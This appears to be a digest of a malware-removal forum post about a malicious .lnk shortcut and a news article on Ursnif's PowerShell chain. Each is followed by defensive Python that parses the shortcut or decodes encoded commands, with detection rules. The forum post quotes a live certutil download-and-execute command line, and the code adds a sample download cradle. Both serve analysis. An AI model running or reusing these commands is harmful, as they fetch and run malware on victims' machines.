.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double-clicking of a bad .lnk file caused damage. When I did double-click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username AppData startup folder. I ran scans with Malwarebytes and Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…
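The post quotes the shortcut target as Explorer shows it, as one string. On disk a .lnk stores it in pieces: the %ComSpec% part goes into an EnvironmentVariableDataBlock (LinkFlags bit HasExpString) and everything after it into the COMMAND_LINE_ARGUMENTS string, so triaging a suspect shortcut means parsing the file, not grepping it. What follows is an added example, not code from the post or from BleepingComputer: a small parser for the shell link format laid out in MS-SHLLINK, a .lnk built in memory that carries the target the poster quoted (the working directory is made up, because the post's is cut off), and a few rules of the kind an analyst would run over it. The rule names, the %TEMP% working directory and the function names are this example's own assumptions. A shortcut written by Explorer also carries a LinkTargetIDList and a LinkInfo block; the parser skips both by their declared size.

```python
import re
import struct

# Layout constants from the MS-SHLLINK specification (shell link binary format).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
HAS_EXP_STRING = 0x200      # an EnvironmentVariableDataBlock is present
ENV_BLOCK_SIG = 0xA0000001
ENV_BLOCK_SIZE = 0x314      # 8-byte block header + 260 ANSI + 520 Unicode bytes

# The target quoted in the post, split the way the format stores it. The working
# directory is a constructed value; the post's own is truncated.
POSTED_TARGET = "%ComSpec%"
POSTED_ARGUMENTS = r'/v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1'
SAMPLE_WORKING_DIR = "%TEMP%"


def _string_data(text):
    """One StringData entry: CountCharacters (uint16) followed by UTF-16LE characters."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(env_target, working_dir, arguments):
    """Constructed minimal .lnk: header, StringData, EnvironmentVariableDataBlock, terminator."""
    flags = HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE | HAS_EXP_STRING
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    env_block = (struct.pack("<II", ENV_BLOCK_SIZE, ENV_BLOCK_SIG)
                 + env_target.encode("ascii").ljust(260, b"\0")
                 + env_target.encode("utf-16-le").ljust(520, b"\0"))
    return (header + _string_data(working_dir) + _string_data(arguments)
            + env_block + struct.pack("<I", 0))


def parse_lnk(data):
    """Return the fields an analyst cares about; IDList and LinkInfo are skipped by size."""
    if (len(data) < LNK_HEADER_SIZE or data[:4] != struct.pack("<I", LNK_HEADER_SIZE)
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    while pos + 4 <= len(data):          # ExtraData: blocks end with a BlockSize < 4
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 8 or pos + size > len(data):
            break
        sig = struct.unpack_from("<I", data, pos + 4)[0]
        if sig == ENV_BLOCK_SIG and size == ENV_BLOCK_SIZE:
            unicode_target = data[pos + 8 + 260:pos + 8 + 260 + 520]
            fields["env_target"] = unicode_target.decode("utf-16-le").split("\0", 1)[0]
        pos += size
    return fields


# Rule names are this example's own, not a vendor's signature set.
SUSPICIOUS = (
    ("comspec_target", re.compile(r"%ComSpec%|\bcmd(?:\.exe)?\b", re.I)),
    ("cmd_delayed_expansion", re.compile(r"/v:on", re.I)),
    ("cmd_variable_obfuscation", re.compile(r"![A-Za-z0-9_]+!")),
    ("certutil_download", re.compile(r"certutil\b.*-urlcache", re.I)),
    ("url_in_shortcut", re.compile(r"https?://", re.I)),
    ("output_suppressed", re.compile(r">\s*nul\b", re.I)),
)


def triage(fields):
    """Rebuild the command line from the parsed pieces and return the rule names it hits."""
    command_line = " ".join(fields.get(k, "") for k in ("env_target", "relative_path", "arguments"))
    return sorted(name for name, rx in SUSPICIOUS if rx.search(command_line))


if __name__ == "__main__":
    parsed = parse_lnk(build_lnk(POSTED_TARGET, SAMPLE_WORKING_DIR, POSTED_ARGUMENTS))
    print(parsed["env_target"], parsed["arguments"][:40] + "...")
    print("rules hit:", triage(parsed))
```

Pointing parse_lnk at a real file (open(path, "rb").read()) reads it without resolving or running anything; the "path does not exist" dialog the poster saw is what Explorer shows when the target cannot be resolved, which says nothing about whether certutil ran first.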

Ursnif Trojan is back with fileless persistence - CSO Online

Posted: 25 Jan 2019 12:00 AM PST

Researchers warn about a new wave of attacks with an information-stealing Trojan called Ursnif that uses PowerShell and fileless execution mechanisms, making it harder to detect. Some of the attacks also deploy the GandCrab ransomware.

Ursnif, also known as Dreambot, has been around for some time and initially focused on stealing emails and online banking credentials from browsers. However, the Trojan has modules that extend its functionality and has recently been used to deploy other malware as well.

For example, researchers from Carbon Black have observed a spam campaign over the past month that distributes Ursnif, which in turn installs the GandCrab ransomware. "The overall attack leverages several different approaches, which are popular techniques amongst red teamers, espionage focused adversaries and large scale criminal campaigns," the Carbon Black researchers said in a new report.

The attack chain starts off with spam emails that carry Word documents containing malicious macro scripts. The macros are obfuscated with junk code but are designed to execute an encoded PowerShell command stored in the Alternate Text field of an object inside the document.

Document macros and PowerShell scripts have been extensively abused to install malware on computers over the past few years because attackers like to live off the land and these features are present by default in Windows and Microsoft Office.

Ursnif's PowerShell script downloads a payload from a hard-coded command-and-control server and executes it directly in memory. This second payload then downloads another file in raw form from pastebin.com and injects it into the PowerShell process. The final payload is version 5.0.4 of GandCrab, a ransomware program sold on underground markets as a service, where its creators allow other cybercriminals to use it for a cut of the profits. There's already a decryption tool available for some GandCrab variants, but this appears to be a newer version.
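The two stages described above, the encoded PowerShell command hidden in an object's Alternate Text and the in-memory download cradle it runs, are what a document triage script has to pull apart. The following is an added example and is not the article's, Carbon Black's or Ursnif's code. It assumes the encoded command is in the base64-of-UTF-16LE form that powershell.exe -EncodedCommand accepts, reads Alternate Text from the title and descr attributes of wp:docPr in word/document.xml (where Word keeps a drawing's alternative text), and uses a constructed cradle with an example.invalid host in place of the real loader. The .docx it builds contains only word/document.xml, enough for the extractor and nothing more; the indicator names are this example's own.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Constructed stand-in for the stage-one script (not the real Ursnif loader):
# a download-and-run cradle of the kind the article describes.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage1')"


def encode_command(script):
    """Produce the base64-of-UTF-16LE form that powershell.exe -EncodedCommand accepts."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_sample_docx(alt_text):
    """Constructed .docx with one drawing whose Alternate Text (wp:docPr/@descr) is alt_text.
    Only word/document.xml is written; that is all extract_alt_text reads."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s" xmlns:wp="%s"><w:body><w:p><w:r><w:drawing><wp:inline>'
        '<wp:docPr id="1" name="Picture 1" descr="%s"/>'
        '</wp:inline></w:drawing></w:r></w:p></w:body></w:document>'
        % (W_NS, WP_NS, escape(alt_text, {'"': "&quot;"}))
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def extract_alt_text(docx_bytes):
    """Alternate Text of every drawing: Word stores it in wp:docPr title/descr attributes."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    texts = []
    for doc_pr in root.iter("{%s}docPr" % WP_NS):
        texts.extend(v for v in (doc_pr.get("title"), doc_pr.get("descr")) if v)
    return texts


def decode_encoded_command(blob):
    """Decode an -EncodedCommand blob back to script text; None if blob is not one."""
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


# Indicator names are this example's own, not a vendor's signature set.
CRADLE_INDICATORS = (
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("web_download", re.compile(r"Net\.WebClient|Download(?:String|Data|File)|Invoke-WebRequest", re.I)),
    ("paste_site", re.compile(r"pastebin\.com", re.I)),
    ("in_memory_load", re.compile(r"FromBase64String|Reflection\.Assembly", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
)


def triage_document(docx_bytes):
    """Decode each Alternate Text field as an encoded command and report the indicators hit."""
    findings = []
    for text in extract_alt_text(docx_bytes):
        script = decode_encoded_command(text)
        if script is None:
            continue
        hits = sorted(name for name, rx in CRADLE_INDICATORS if rx.search(script))
        if hits:
            findings.append({"script": script, "indicators": hits})
    return findings


if __name__ == "__main__":
    doc = build_sample_docx(encode_command(SAMPLE_CRADLE))
    for finding in triage_document(doc):
        print(finding["indicators"], finding["script"])
```

The same decode_encoded_command step applies to process-creation logs: a powershell.exe command line carrying -EncodedCommand or -enc is decoded the same way before the indicators are matched, which is where the pastebin.com and in-memory loading stages of this chain would surface.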
